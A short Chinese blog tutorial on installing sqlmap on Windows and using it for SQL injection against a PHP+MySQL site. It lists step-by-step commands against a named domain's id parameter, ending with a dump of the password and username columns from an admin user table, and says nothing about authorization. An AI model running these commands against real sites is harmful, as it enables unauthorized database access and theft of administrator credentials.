利用sqlmap進行php+mysql注入(windows環(huán)境)
老威SEO前段時間研究了一下sqlmap,其作為一款自動化的sql注入滲透工具,注入方式、注入成功后的取數(shù)據(jù)等等都是自動化的,非常適合我們這些小白前期玩玩滲透玩玩安全,它是用python寫的,因此需要先安裝python環(huán)境,一般都是傻瓜式安裝操作
一、sqlmap的安裝
1.python下載地址:
https://www.python.org/downloads/
2.sqlmap下載地址:
把下載的sqlmap壓縮包解壓到文件夾sqlmap中,并將其復(fù)制粘貼到 “C:\Python27” 目錄下(注:Python27為python安裝文件夾)
在桌面新建一個cmd的快捷方式,將其命名為“SQLMap”,并鍵入對象位置為:cmd,快捷方式名稱:SQLMap
雙擊剛才創(chuàng)建的快捷方式,輸入sqlmap.py -h,出現(xiàn)如下信息則表示安裝成功。
二、sqlmap的常用命令
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" 檢測注入
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --current-user 獲取當(dāng)前用戶 laowei@localhost
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --current-db 獲取當(dāng)前數(shù)據(jù)庫 如為db_inis
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --tables -D db_inis
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables 獲取當(dāng)前數(shù)據(jù)庫下所有表 如表為3
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user 獲取表3下的所有字段 如字段為4,5,6
sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump 注入完成
最后:此文章還待更新中……請持續(xù)關(guān)注
掃描二維碼推送至手機訪問。
版權(quán)聲明:本文由小熊SEO發(fā)布,如需轉(zhuǎn)載請注明出處。
